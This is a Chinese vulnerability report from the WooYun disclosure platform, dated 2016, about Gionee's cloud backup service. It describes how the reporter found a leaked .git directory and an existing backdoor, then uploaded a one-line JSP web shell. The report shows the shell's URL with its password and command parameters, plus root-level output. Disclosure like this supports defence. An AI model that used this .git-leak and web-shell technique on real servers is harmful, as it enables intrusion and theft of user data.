漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-20: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
详细说明:
http://id.gionee.com/members/start#/ 金立云服务系统。自动备份用户手机相册、通讯录、手机定位。。。金立手机多少用户? 危害就有多大。
先是一个git泄漏http://id.gionee.com/.git/
下载到网站源码。然后发现后门一个。应该是运维放上去的吧。反正部署git的时候就有了
然后我就随手传了一个园长的一句话。
http://id.gionee.com/2l.jsp?pwd=023&i=id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root权限,拿到了服务器root也就说明整个云服务系统沦陷了把。。
用户数据我就不看了
漏洞证明:
http://id.gionee.com/members/start#/ 金立云服务系统。自动备份用户手机相册、通讯录、手机定位。。。金立手机多少用户? 危害就有多大。
先是一个git泄漏http://id.gionee.com/.git/
下载到网站源码。然后发现后门一个。应该是运维放上去的吧。反正部署git的时候就有了
然后我就随手传了一个园长的一句话。
http://id.gionee.com/2l.jsp?pwd=023&i=id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root权限,拿到了服务器root也就说明整个云服务系统沦陷了把。。
用户数据我就不看了
修复方案:
版权声明:转载请注明来源 路人甲@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2016-01-19 15:49
厂商回复:
感谢,这个是已知问题。谢谢
最新状态:
2016-01-20:更正一下:问题不是已知问题,是新漏洞.现在已经进行修复。再次进行感谢!!!!